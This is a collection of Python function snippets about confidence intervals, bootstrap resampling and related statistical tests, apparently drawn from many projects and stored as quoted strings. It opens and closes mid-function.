# means of samples\n mean1 = np.mean(array1)\n mean2 = np.mean(array2)\n\n # size of the samples\n n1 = len(array1)\n n2 = len(array2)\n\n # difference of the two means\n diff_mean = mean1 - mean2\n\n # the z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n\n # margin of error\n margin_of_error = z_star * np.sqrt((std1 ** 2 / n1) + (std2 ** 2 / n2))\n\n # upper and lower confidence bounds\n lcb = np.round(diff_mean - margin_of_error, 2)\n ucb = np.round(diff_mean + margin_of_error, 2)\n\n print(\n \"{}% Confidence Interval for difference of two population means: ({},{})\".format(\n conf_level, lcb, 
ucb\n )\n )", "def bootstrap(init_file, nbootstraps):\n check_presence_init(init_file)\n dict_ = read(init_file)\n\n # Process the information specified in the initialization file\n nbins, logit, bandwidth, gridsize, a, b = process_user_input(dict_)\n trim, rbandwidth, reestimate_p = process_default_input(dict_)\n\n # Suppress output\n show_output = False\n\n # Prepare empty array to store output values\n mte_boot = np.zeros([gridsize, nbootstraps])\n\n # Load the baseline data\n data = read_data(dict_[\"ESTIMATION\"][\"file\"])\n\n counter = 0\n while counter < nbootstraps:\n boot_data = resample(data, replace=True, n_samples=len(data), random_state=None)\n\n # Process the inputs for the decision equation\n indicator, D, Z = process_choice_data(dict_, boot_data)\n\n # Estimate propensity score P(z)\n ps = estimate_treatment_propensity(D, Z, logit, show_output)\n\n if isinstance(ps, np.ndarray): # & (np.min(ps) <= 0.3) & (np.max(ps) >= 0.7):\n # Define common support and trim the data, if trim=True\n boot_data, ps = trim_support(\n dict_,\n boot_data,\n logit,\n ps,\n indicator,\n nbins,\n trim,\n reestimate_p,\n show_output,\n )\n\n # Estimate the observed and unobserved component of the MTE\n X, b1_b0, b0, mte_u = mte_components(\n dict_, boot_data, ps, rbandwidth, bandwidth, gridsize, a, b, show_output\n )\n\n # Calculate the MTE component that depends on X\n mte_x = np.dot(X, b1_b0).mean(axis=0)\n\n # Put the MTE together\n mte = mte_x + mte_u\n mte_boot[:, counter] = mte\n\n counter += 1\n\n else:\n continue\n\n return mte_boot", "def non_param_unpaired_ci(sample1, sample2, alpha=0.05):\n n1 = len(sample1)\n n2 = len(sample2)\n N = norm.ppf(1 - alpha/2)\n diffs = sorted([i-j for i in sample1 for j in sample2])\n k = np.math.ceil(n1*n2/2 - (N * (n1*n2*(n1+n2+1)/12)**0.5))\n CI = (round(diffs[k-1], 3), round(diffs[len(diffs)-k], 3))\n return CI", "def t_confidence_Interval_Difference_Of_Means(xSamples, ySamples, confidence):\n try:\n if len(xSamples) >= 30 or len(ySamples) >= 30:\n raise sampleSizeError(\"Should use normal distribution instead. 
m or n > 30.\")\n \n if confidence > 1:\n confidence = confidence / 100.0\n print(f\"Converting confidence interval to {confidence}\")\n\n elif type(confidence) != int or type(confidence) != float:\n raise ValueError(\"Confidence Interval must be a numeric value\")\n \n # Find mean and variance for both sample distributions\n n = len(xSamples) \n xBar = sample_mean(xSamples)\n xSampStd = sample_variance(xSamples) ** .5\n \n m = len(ySamples)\n yBar = sample_mean(ySamples)\n ySampStd = sample_variance(ySamples) ** .5\n \n # Find t at alpha/2 and the new distribution's sample size - 2\n # Calculate the sample pooling standard deviation\n tAlpha = (1 + confidence) / 2.0\n t = scipy.stats.t.ppf(tAlpha, (m + n - 2)) \n spsd = ((((n - 1)* (xSampStd**2)) + ((m - 1) * (ySampStd**2)))/(m + n - 2)) ** .5 \n \n # Find the lower and upper bound \n # (X-Y) (+/-) t((spsd * (((1/m)+(1/n)) **.5))\n lowerBound = (xBar - yBar) - t * (spsd * (((1/m)+(1/n)) **.5))\n upperBound = (xBar - yBar) + t * (spsd * (((1/m)+(1/n)) **.5))\n \n return lowerBound, upperBound\n \n except sampleSizeError as inst:\n print(inst.args[0])\n \n except ValueError as inst:\n print(inst.args[0])", "def computeCI(cov, mean):\n mult = 2\n sd = np.diag(cov)**(0.5)\n lower = mean - (mult*sd).reshape(-1,1)\n upper = mean + (mult*sd).reshape(-1,1)\n return lower, upper", "def get_ci(cls, data: tuple or list, cl=0.95,\n is_population=False, tail=\"two\") -> tuple:\n cls._data_validation(data)\n mean = cls.get_mean(data)\n e = cls.get_moe(\n data, cl=cl, is_population=is_population, tail=tail\n )\n return mean - e, mean + e", "def conf(self, success, total):\n try:\n sp = success / total\n conf = binom_conf_interval(success, total, interval='jeffreys')\n uperr = conf[1] - sp # 1 sigma confidence above mean\n loerr = sp - conf[0] # 1 sigma confidence below mean\n return sp, uperr, loerr, 0.5*(uperr+loerr)\n except ValueError as e:\n return 0, 0, 0, 0", "def ci_mean_std_known(array, std, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n mean = np.mean(array)\n n = len(array)\n # calculate standard error\n std_error = std / np.sqrt(n)\n # find z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n # margin of error\n margin_of_error = np.round(z_star * std_error, 2)\n\n # calculate the lower and upper confidence bounds\n lcb = np.round(mean - margin_of_error, 2)\n ucb = np.round(mean + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Mean: ({}, {})\".format(\n conf_level, lcb, ucb\n )\n )", "def eg_bootmu():\n\n a = []\n b = []\n\n for _ in range(100):\n a.append(utils.gaussian(10, 1))\n\n print(\"\", \"mu\", \"sd\", \"cliffs\", \"boot\", \"both\", sep=\"\\t\")\n print(\"\", \"--\", \"--\", \"------\", \"----\", \"----\", sep=\"\\t\")\n\n for mu in range(100, 111):\n b = []\n\n for _ in range(100):\n b.append(utils.gaussian(mu / 10, 1))\n\n cl = utils.cliffsDelta(a, b)\n bs = stats.bootstrap(a, b)\n\n print(\"\", mu / 10, 1, cl, bs, cl and bs, sep=\"\\t\")", "def estimates_conf(self):\n return self._est_L, self._est_R", "def bootstrap(init_file, nbootstraps, show_output=False):\n check_presence_init(init_file)\n dict_ = read(init_file)\n\n nbins = dict_[\"ESTIMATION\"][\"nbins\"]\n trim = dict_[\"ESTIMATION\"][\"trim_support\"]\n rbandwidth = dict_[\"ESTIMATION\"][\"rbandwidth\"]\n bandwidth = dict_[\"ESTIMATION\"][\"bandwidth\"]\n gridsize = dict_[\"ESTIMATION\"][\"gridsize\"]\n a = 
dict_[\"ESTIMATION\"][\"ps_range\"][0]\n b = dict_[\"ESTIMATION\"][\"ps_range\"][1]\n\n logit = dict_[\"ESTIMATION\"][\"logit\"]\n\n # Distribute initialization information.\n data = read_data(dict_[\"ESTIMATION\"][\"file\"])\n\n # Prepare empty arrays to store output values\n mte_boot = np.zeros([gridsize, nbootstraps])\n\n counter = 0\n while counter < nbootstraps:\n boot = resample(data, replace=True, n_samples=len(data), random_state=None)\n\n # Process data for the semiparametric estimation.\n indicator = dict_[\"ESTIMATION\"][\"indicator\"]\n D = boot[indicator].values\n Z = boot[dict_[\"CHOICE\"][\"order\"]]\n\n # The Local Instrumental Variables (LIV) approach\n\n # 1. Estimate propensity score P(z)\n ps = estimate_treatment_propensity(D, Z, logit, show_output)\n\n if isinstance(ps, np.ndarray): # & (np.min(ps) <= 0.3) & (np.max(ps) >= 0.7):\n\n # 2a. Find common support\n treated, untreated, common_support = define_common_support(\n ps, indicator, boot, nbins, show_output\n )\n\n # 2b. Trim the data\n if trim is True:\n boot, ps = trim_data(ps, common_support, boot)\n\n # 3. Double Residual Regression\n # Sort data by ps\n boot = boot.sort_values(by=\"ps\", ascending=True)\n ps = np.sort(ps)\n\n X = boot[dict_[\"TREATED\"][\"order\"]]\n Xp = construct_Xp(X, ps)\n Y = boot[[dict_[\"ESTIMATION\"][\"dependent\"]]]\n\n b0, b1_b0 = double_residual_reg(ps, X, Xp, Y, rbandwidth, show_output)\n\n # Turn the X, Xp, and Y DataFrames into np.ndarrays\n X_arr = np.array(X)\n Xp_arr = np.array(Xp)\n Y_arr = np.array(Y).ravel()\n\n # 4. Compute the unobserved part of Y\n Y_tilde = Y_arr - np.dot(X_arr, b0) - np.dot(Xp_arr, b1_b0)\n\n # 5. Estimate mte_u, the unobserved component of the MTE,\n # through a locally quadratic regression\n quantiles, mte_u = locpoly(ps, Y_tilde, 1, 2, bandwidth, gridsize, a, b)\n\n # 6. 
construct MTE\n # Calculate the MTE component that depends on X\n mte_x = np.dot(X, b1_b0).mean(axis=0)\n\n # Put the MTE together\n mte = mte_x + mte_u\n\n mte_boot[:, counter] = mte\n\n counter += 1\n\n else:\n continue\n\n return mte_boot", "def get_conf_interval_from_sample(n, mean, sigma, alpha = 0.95) :\n df = n-1\n scale = sigma / np.sqrt(n)\n return stats.t.interval(alpha=alpha, df=df, loc=mean, scale=scale)", "def test_predict_ci():\n df = pd.DataFrame(dict(x=[1.0, 2.0, 3.0, 4.0]))\n\n class Model(Poisson):\n dv = \"y\"\n features = dict(x=dict(transformer=lambda x: x.x, prior=dist.Normal(0, 1)))\n\n # ci = yhat when no variation in samples\n config = {\"samples\": {\"x\": onp.ones((2, 10))}}\n model = Model.from_dict(config)\n pred = model.predict(df, ci=True).round(5).astype(\"float32\")\n assert pred.y.equals(pred.ci_lower)\n assert pred.y.equals(pred.ci_upper)\n\n # lower < yhat < upper when some variation in samples\n config = {\"samples\": {\"x\": onp.random.normal(size=(2, 100)) * 0.1}}\n model = Model.from_dict(config)\n pred = model.predict(df, ci=True)\n assert (pred.y > pred.ci_lower).all()\n assert (pred.y < pred.ci_upper).all()", "def a_test2_predict_is_intervals_bbvi():\n model = ARIMAX(formula=\"y ~ x1 + x2\", data=data, ar=2, ma=2, family=Exponential())\n x = model.fit('BBVI', iterations=100)\n predictions = model.predict_is(h=10, intervals=True)\n assert(np.all(predictions['99% Prediction Interval'].values >= predictions['95% Prediction Interval'].values))\n assert(np.all(predictions['95% Prediction Interval'].values >= predictions['5% Prediction Interval'].values))\n assert(np.all(predictions['5% Prediction Interval'].values >= predictions['1% Prediction Interval'].values))", "def a_test2_predict_intervals_bbvi():\n model = ARIMAX(formula=\"y ~ x1 + x2\", data=data, ar=2, ma=2, family=Exponential())\n x = model.fit('BBVI', iterations=100)\n predictions = model.predict(h=10, oos_data=data_oos, intervals=True)\n\n assert(np.all(predictions['99% Prediction Interval'].values >= predictions['95% Prediction Interval'].values))\n assert(np.all(predictions['95% Prediction Interval'].values >= predictions['5% Prediction Interval'].values))\n assert(np.all(predictions['5% Prediction Interval'].values >= predictions['1% Prediction Interval'].values))", "def compute_bootstrapped_diff(x0, x1, is_paired, effect_size,\n resamples=5000, random_seed=12345):\n \n from . import effsize as __es\n import numpy as np\n from numpy.random import PCG64, RandomState\n \n # rng = RandomState(default_rng(random_seed))\n rng = RandomState(PCG64(random_seed))\n\n out = np.repeat(np.nan, resamples)\n x0_len = len(x0)\n x1_len = len(x1)\n \n for i in range(int(resamples)):\n \n if is_paired:\n if x0_len != x1_len:\n raise ValueError(\"The two arrays do not have the same length.\")\n random_idx = rng.choice(x0_len, x0_len, replace=True)\n x0_sample = x0[random_idx]\n x1_sample = x1[random_idx]\n else:\n x0_sample = rng.choice(x0, x0_len, replace=True)\n x1_sample = rng.choice(x1, x1_len, replace=True)\n \n out[i] = __es.two_group_difference(x0_sample, x1_sample,\n is_paired, effect_size)\n \n # check whether there are any infinities in the bootstrap,\n # which likely indicates the sample sizes are too small as\n # the computation of Cohen's d and Hedges' g necessitated \n # a division by zero.\n # Added in v0.2.6.\n \n # num_infinities = len(out[np.isinf(out)])\n # print(num_infinities)\n # if num_infinities > 0:\n # warn_msg = \"There are {} bootstraps that are not defined. 
\"\\\n # \"This is likely due to smaple sample sizes. \"\\\n # \"The values in a bootstrap for a group will be more likely \"\\\n # \"to be all equal, with a resulting variance of zero. \"\\\n # \"The computation of Cohen's d and Hedges' g will therefore \"\\\n # \"involved a division by zero. \"\n # warnings.warn(warn_msg.format(num_infinities), category=\"UserWarning\")\n \n return out", "def standard_bootstrap(dataset):\n randseed=np.random.randint(0,10000)\n np.random.seed(randseed)\n \n n = dataset.shape[0]\n b = np.random.randint(0, high=n-1, size=n)\n return dataset[b]", "def bootstrap(x, iter=int(1E6), return_samples=False):\n\n \n means = np.empty(iter) \n dfs = []\n for i in tqdm(range(iter), desc='Performing bootstrap sampling'):\n resamp = np.random.choice(x, size=len(x), replace=True)\n means[i] = resamp.mean()\n\n if return_samples:\n _df = pd.DataFrame([])\n _df['value'] = resamp\n _df['iter'] = i + 1\n dfs.append(_df)\n\n # Compute confidence intervals of the means.\n mean_val = means.mean()\n bounds_ci = {'99%': (0.5, 99.5), '95%': (2.5, 97.5), '90%': (5, 95),\n '75%': (12.5, 87.5), '50%': (25, 75), '25%': (37.5, 62.5),\n '10%': (45, 55), '5%': (47.5, 52.5), '1%': (49.5, 50.5)} \n cis = {} \n for k, v in bounds_ci.items():\n bounds = np.percentile(means, v)\n cis[k] = bounds\n\n statistics['original_data'] = x\n statistics['resampled_means'] = means\n statistics['mean_value'] = mean_val\n statistics['confidence_intervals'] = cis\n\n if return_samples:\n _df = pd.concat(dfs, sort=False)\n return [statistics, _df]\n else:\n return statistics", "def get_ci(self, ci_percent, test_type='t-test'):\n prop_cut = (1 - ci_percent) / 2\n if test_type == 'bootstrap':\n perf = self.evaluations\n while len(perf.shape) > 2:\n perf = np.nanmean(perf, axis=-1)\n framed_evals = np.concatenate(\n (np.tile(np.array(([-np.inf], [np.inf])),\n (1, self.n_model)),\n perf),\n axis=0)\n ci = [np.quantile(framed_evals, prop_cut, axis=0),\n np.quantile(framed_evals, 1 - prop_cut, axis=0)]\n else:\n tdist = scipy.stats.t\n std_eval = self.get_sem()\n means = self.get_means()\n ci = [means + std_eval * tdist.ppf(prop_cut, self.dof),\n means - std_eval * tdist.ppf(prop_cut, self.dof)]\n return ci", "def mean_confidence_interval(data, confidence=0.95):\n\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, m-h, m+h", "def a_test_predict_is_intervals_bbvi():\n model = ARIMAX(formula=\"y ~ x1\", data=data, ar=2, ma=2, family=Exponential())\n x = model.fit('BBVI', iterations=100)\n predictions = model.predict_is(h=10, intervals=True)\n assert(np.all(predictions['99% Prediction Interval'].values >= predictions['95% Prediction Interval'].values))\n assert(np.all(predictions['95% Prediction Interval'].values >= predictions['5% Prediction Interval'].values))\n assert(np.all(predictions['5% Prediction Interval'].values >= predictions['1% Prediction Interval'].values))", "def a_test_predict_intervals_bbvi():\n model = ARIMAX(formula=\"y ~ x1\", data=data, ar=2, ma=2, family=Exponential())\n x = model.fit('BBVI', iterations=100)\n predictions = model.predict(h=10, oos_data=data_oos, intervals=True)\n\n assert(np.all(predictions['99% Prediction Interval'].values >= predictions['95% Prediction Interval'].values))\n assert(np.all(predictions['95% Prediction Interval'].values >= predictions['5% Prediction Interval'].values))\n assert(np.all(predictions['5% Prediction Interval'].values >= predictions['1% Prediction 
Interval'].values))", "def non_param_paired_ci(sample1, sample2, alpha):\n n = len(sample1)\n N = norm.ppf(1 - alpha/2)\n diff_sample = sorted(list(map(operator.sub, sample2, sample1)))\n averages = sorted([(s1+s2)/2 for i, s1 in enumerate(diff_sample)\n for _, s2 in enumerate(diff_sample[i:])])\n k = np.math.ceil(n*(n+1)/4 - (N * (n*(n+1)*(2*n+1)/24)**0.5))\n CI = (round(averages[k-1], 3), round(averages[len(averages)-k], 3))\n return CI", "def test_pvalue_from_bootstrapping(perfectModelEnsemble_initialized_control, metric):\n sig = 95\n pm = perfectModelEnsemble_initialized_control.isel(lead=[0, 1, 2])\n actual = (\n pm.bootstrap(\n metric=metric,\n iterations=ITERATIONS,\n comparison=\"e2c\",\n sig=sig,\n dim=\"init\",\n reference=\"uninitialized\",\n )\n .sel(skill=\"uninitialized\", results=\"p\")\n .isel(lead=0)\n )\n # check that significant p-value\n assert actual.tos.values < 2 * (1 - sig / 100)\n # lead units keep\n assert actual.lead.attrs[\"units\"] == \"years\"", "def get_eq_n_intervals(array):\n mean = np.mean(array)\n std = 2 # Fixed std. Too extreme values when using std from the array (either 0 or 127).\n # This is very likely because np.std(array) is the standard deviation of all the points of the\n # embedded espace, but what we use in the end is the difference between those points. Calculate \n # the standard deviation between all posible distances is not really very affordable to keep this\n # low resource consuming, and also it hard to generalise when you want to use more than 2 words \n # to calculate the distance. 2 seems to work very good. You can try to fine tune it\n # more if you feel like it.\n\n norm = stats.norm(mean, std)\n intervals = norm.ppf(np.linspace(0, 1, 129))\n return intervals", "def plot_confidence_interval_for_data (model, X):\n preds = np.stack([t.predict(X) for t in model.estimators_], axis=1)\n preds_ds = pd.DataFrame()\n preds_ds['mean'] = preds.mean(axis=1)\n preds_ds['std'] = preds.std(axis=1)\n\n fig = plt.figure(figsize=(15,6))\n my_xticks = ['datapoint ' + str(i+1) for i in list(preds_ds.index)]\n plt.errorbar(x = preds_ds.index, y=preds_ds['mean'], yerr=preds_ds['std'], \n fmt='o', color='blue', ecolor='lightblue', capsize=3)\n plt.title('Confidence Interval for the predicted value')\n plt.xticks(preds_ds.index, my_xticks)\n for i in list(preds_ds.index):\n m, std = round(preds_ds['mean'][i],1), round(preds_ds['std'][i],2)\n s=f' pred={m} \\n std dev= {std}'\n plt.text(x = i, y=preds_ds['mean'][i], s=s ) \n plt.show()", "def _lower_confidence_bound(self, NA: int, N: int, alpha: float) -> float:\n return proportion_confint(NA, N, alpha=2 * alpha, method=\"beta\")[0]", "def bootstrapping(\n self,\n estimator,\n estimator_inputs,\n qoi_mean: Union[NumpyFloatArray, NumpyIntArray],\n num_bootstrap_samples: PositiveInteger = None,\n confidence_level: PositiveFloat = 0.95,\n **kwargs,\n ):\n\n n_qois = qoi_mean.shape[0]\n n_outputs = qoi_mean.shape[1]\n\n ##################### STORAGE #####################\n\n # store generators of the inputs for bootstrap sampling\n input_generators = []\n\n # store the qoi computed using bootstrap samples\n bootstrapped_qoi = np.zeros((n_outputs, n_qois, num_bootstrap_samples))\n\n # store the confidence interval for each qoi\n confidence_interval_qoi = np.zeros((n_outputs, n_qois, 2))\n\n self._create_generators(estimator_inputs, input_generators)\n\n self._evaluate_boostrap_sample_qoi(bootstrapped_qoi, estimator, input_generators, kwargs, num_bootstrap_samples)\n\n confidence_interval_qoi = 
self._calculate_confidence_intervals(bootstrapped_qoi, confidence_interval_qoi,\n confidence_level, n_outputs, qoi_mean)\n\n return confidence_interval_qoi", "def empirical_bootstrap(self, pop_data: np.ndarray, n = None, B = 1000, func=None):\n # store the estimates for each bootstrapped sample\n n = pop_data.shape[0] if n is None else n\n boot_est = [None] * B\n index = 0\n for _ in range(B):\n idx = np.random.randint(low=0, high=n, size=n)\n est = func(pop_data[idx], axis=0)\n boot_est[index] = est\n index += 1\n \n result = {}\n result['estimates'] = boot_est\n result['est_mean'] = np.mean(boot_est)\n result['est_err'] = np.std(boot_est, ddof=1)\n \n return result", "def get_confidence_interval(\n num_people,\n num_iter=1000000,\n percentile=2.576,\n num_days=365,\n):\n mean = 0.0\n variance = 0.0 # not exactly\n for i in range(1, num_iter + 1):\n x = [randint(1, num_days) for person in range(num_people)]\n x.sort()\n is_consecutive = any(p + 1 == q for (p, q) in zip(x[:-1], x[1:], strict=True))\n is_a_loop = x[0] + num_days - 1 == x[-1]\n is_positive = int(is_consecutive or is_a_loop)\n delta = is_positive - mean\n mean += delta / float(i)\n variance += delta * (is_positive - mean)\n sd = sqrt(variance / float(num_iter - 1))\n lower_bound = mean - percentile * sd / sqrt(num_iter)\n upper_bound = mean + percentile * sd / sqrt(num_iter)\n print(\n \"Number of people: {}\\tLower bound: {:2.5%}\\tUpper bound: {:2.5%}\".format(\n num_people,\n lower_bound,\n upper_bound,\n ),\n )\n return lower_bound, upper_bound", "def main():\n df = pd.read_csv('data/Boston.csv')\n n_obs = len(df)\n np.random.seed(111)\n\n # Part a\n medv_mean = np.mean(df['medv'])\n print('medv mean = {:.3f}'.format(medv_mean))\n\n # Part b\n medv_stan_err = statistics.stdev(df['medv']) / np.sqrt(n_obs)\n print('medv standard error = {:.5f}'.format(medv_stan_err))\n\n # Part c\n n_boot_iters = 10000\n medv_mean_array = np.zeros(n_boot_iters)\n for ii in range(n_boot_iters):\n ind = np.random.choice(n_obs, n_obs, replace=True)\n medv_mean_array[ii] = np.mean(df.loc[ind, 'medv'])\n\n medv_stan_err_boot = statistics.stdev(medv_mean_array)\n print('medv standard error (bootstrap) = {:.5f}'.format(medv_stan_err_boot))\n\n # Part d\n ci_95 = [medv_mean - 2 * medv_stan_err,\n medv_mean + 2 * medv_stan_err]\n ci_95_boot = [medv_mean - 2 * medv_stan_err_boot,\n medv_mean + 2 * medv_stan_err_boot]\n print('95% CI = [{:.3f}, {:.3f}]'.format(ci_95[0], ci_95[1]))\n print('95% CI (bootstrap) = [{:.3f}, {:.3f}]'.format(ci_95_boot[0], ci_95_boot[1]))\n\n # Part e\n medv_med = np.median(df['medv'])\n print('medv med = {:.3f}'.format(medv_med))\n\n # Part f\n medv_med_array = np.zeros(n_boot_iters)\n for ii in range(n_boot_iters):\n ind = np.random.choice(n_obs, n_obs, replace=True)\n medv_med_array[ii] = np.median(df.loc[ind, 'medv'])\n\n medv_med_stan_err_boot = statistics.stdev(medv_med_array)\n print('medv median standard error (bootstrap) = {:.5f}'.format(medv_med_stan_err_boot))\n\n # Part g\n medv_10 = np.percentile(df['medv'], 10)\n print('medv 10th percentile = {:.3f}'.format(medv_10))\n\n # Part f\n medv_10_array = np.zeros(n_boot_iters)\n for ii in range(n_boot_iters):\n ind = np.random.choice(n_obs, n_obs, replace=True)\n medv_10_array[ii] = np.percentile(df.loc[ind, 'medv'], 10)\n\n medv_10_stan_err_boot = statistics.stdev(medv_10_array)\n print('medv 10th percenile standard error (bootstrap) = {:.5f}'.format(medv_10_stan_err_boot))", "def estimate_noiseperbl(data):\n\n # define noise per baseline for data seen by 
detect_bispectra or image\n datamean = data.mean(axis=2).imag # use imaginary part to estimate noise without calibrated, on-axis signal\n noiseperbl = datamean.std() # measure single noise for input to detect_bispectra\n logger.debug('Measured noise per baseline of {0:.3f}'.format(noiseperbl))\n return noiseperbl", "def get_confidence_interval(self,a,b):\n\t\tk_vals,prob_vals = self.tuple_of_probabilities\n\t\tworking_indices = [i for i,v in enumerate(k_vals) if (v >= a and v<= b)]\n\t\tworking_prob_vals = [prob_vals[i] for i in working_indices]\n\t\treturn sum(working_prob_vals)", "def test_conf_interval_ecdf_method(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n\n # ``quantile_estimation_method = \"ecdf\"``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"ecdf\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n pred_df[ERR_STD_COL] = round(pred_df[ERR_STD_COL], 2)\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.32, 289.38, 291.3, 291.34), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.63, -5.56, -4.13, -4.08), (\n \"quantiles are incorrect\")\n expected_stds = [0.29, 0.42, 0.42, 0.42, 0.42, 0.58, 0.58, 0.58, 0.58, 0.58,\n 0.58, 0.42]\n assert list(pred_df[ERR_STD_COL].values) == expected_stds", "def bootstrap_mean(x, n=100):\n out = []\n\n for i in range(n):\n idx = pd.Series(np.arange(len(x))).sample(frac=1.0, replace=True).values\n out.append(x[idx].mean(0))\n outm = np.stack(out)\n return outm.mean(0), outm.std(0)", "def NbIntervals(self, *args):\n return _Adaptor3d.Adaptor3d_Curve_NbIntervals(self, *args)", "def create_interval_NEW(confidence, samples=False, n_samples=False, sample_mean=False, sd=False, true_std=False, is_prob=False, is_normal=False, side=\"both\"):\n h = 0\n\n if samples:\n n_samples = len(samples)\n sample_mean = float(np.mean(samples))\n sd = float(np.std(samples))\n std_err = float(st.sem(samples))\n else:\n if sd is False and n_samples < 30:\n raise Exception(\"confidence intervals\", \"Missing standard deviation to estimate mean with less than 30 samples.\")\n else:\n std_err = sd / math.sqrt(n_samples)\n\n if side == \"both\":\n alpha = (1 - confidence) / 2\n z = st.norm.ppf(1 - (1 - confidence) / 2)\n t = st.t.ppf((1 + confidence) / 2, n_samples - 1)\n else:\n alpha = (1 - confidence)\n z = st.norm.ppf(1 - (1 - confidence))\n t = st.t.ppf((1 + confidence), n_samples - 1)\n\n if is_prob: ## CI for probabilities\n if sample_mean == 0: ## Rule of three\n return Interval(0, 3/n_samples)\n elif sample_mean == 1: ## Rule of three\n return Interval(1 - 3/n_samples, 1)\n elif n_samples >= 30: ## Binomial proportion confidence interval: Normal/Gaussian distribution of the proportion: https://machinelearningmastery.com/confidence-intervals-for-machine-learning/\n h = z * math.sqrt((sample_mean * (1 - sample_mean)) / n_samples)\n elif n_samples < 30:\n interval = st.bayes_mvs(samples, confidence)[0][1] ## 0 is the mean, 1 is the interval estimate\n return 
Interval(interval[0], interval[1])\n ## h = t * math.sqrt((mean * (1 - mean)) / n_samples) ## TODO, check this\n else: ## CI for usual values\n if (n_samples >= 30 or is_normal) and true_std is not False: ## use Normal Distribution\n h = z * true_std / math.sqrt(n_samples)\n elif is_normal: ## use Student distribution\n # h = t * s / math.sqrt(n_samples)\n h = t * std_err\n else:\n interval = st.bayes_mvs(samples, confidence)[0][1] ## 0 is the mean, 1 is the interval estimate\n return Interval(interval[0], interval[1])\n\n h = float(h)\n if side == \"both\":\n return Interval(sample_mean - h, sample_mean + h)\n elif side == \"right\":\n if is_prob:\n return Interval(0, sample_mean + h)\n else:\n return Interval(float('-inf'), sample_mean + h)\n else:\n if is_prob:\n return Interval(sample_mean - h, 1)\n else:\n return Interval(sample_mean - h, float('inf'))", "def eg_pre():\n\n print(\"\\teg3\")\n\n d = 1\n\n for _ in range(10):\n t1 = []\n t2 = []\n\n for _ in range(32):\n t1.append(utils.gaussian(10, 1))\n t2.append(utils.gaussian(d * 10, 1))\n\n print(\"\", \"\", d, d < 1.1, stats.bootstrap(\n t1, t2), stats.bootstrap(t1, t1), sep=\"\\t\")\n\n d = round(d + .05, 2)", "def bootstrapping_variance_estimation(data, iterations=100):\n bootstrapped_variance = []\n for i in tqdm(range(1)):\n data_at_index_i = [elem for elem in data]\n\n variance_estimation = []\n for _ in range(iterations):\n bootstrapped_data = []\n for _ in range(len(data_at_index_i)):\n bootstrapped_data.append(np.random.choice(data_at_index_i))\n variance_estimation.append(np.var(bootstrapped_data))\n\n bootstrapped_variance.append(np.mean(variance_estimation, axis=0))\n\n return bootstrapped_variance", "def _boot_h(h, x, y):\n n = 100\n ind = np.random.randint(x.shape[0], size=n)\n # allocate output\n out = np.empty(n)\n # Loop through each bootstrap point\n for i in range(n):\n # all-1 points\n xx = np.delete(x, i, axis=0)\n yy = np.delete(y, i, axis=0)\n z = (xx - x[i, :]) / h\n out[i] = _nadaraya_watson(z, yy)\n cv = np.sum((y[ind] - out)**2) / float(n)\n\n return cv", "def calc_error(datasample,boots_num):\r\n mse_list=[]\r\n datasample=df_to_array(datasample)\r\n for i in range(boots_num):\r\n boots_indexs,missing_indexs=bootstrapping(datasample)\r\n \r\n boostrapped_data=datasample[boots_indexs][0]\r\n \r\n boots_outsample_data=datasample[missing_indexs]\r\n \r\n\r\n # Train the model \r\n rf_kernal=Model_Train(boostrapped_data)\r\n \r\n # Test the model\r\n test_features=boots_outsample_data[:,:-1]\r\n test_labels=boots_outsample_data[:,-1]\r\n pred=rf_kernal.predict(test_features)\r\n \r\n \r\n # Can change to MAE, MSE\r\n \r\n me=np.mean(pred-test_labels)\r\n #mse=np.mean((pred-train_labels)**2)\r\n #mae=np.mean(np.abs(pred-train_labels))\r\n \r\n mse_list.append(me)\r\n print('Estimated Out of Sample Error=%f'%(np.mean(mse_list)))\r\n return np.mean(mse_list)", "def get_t_CI(self, alpha):\n mean = self.get_mean()\n hl = self.get_t_half_length(alpha)\n\n return [mean - hl, mean + hl]", "def binom_bca_bootstrap_err(k, n, B=10000, CL=[0.025, 0.975], acceleration=True, return_full=False):\n theta_MLE = k/n\n k_i = bootstrap_sample_binomial(k, n, B)\n\n # Bootstrap estimates of the parameter\n theta_i = k_i / n\n theta0_star = np.sum(theta_i) / B\n print(f'theta_MLE = {theta_MLE}, theta0_star = {theta0_star}')\n\n # -------------------------------------------------\n # Original binomial sample created as a vector\n x = np.zeros(n) \n x[0:k] = 1 # 1 == success\n\n # We are interested in the mean\n def t_func(x):\n 
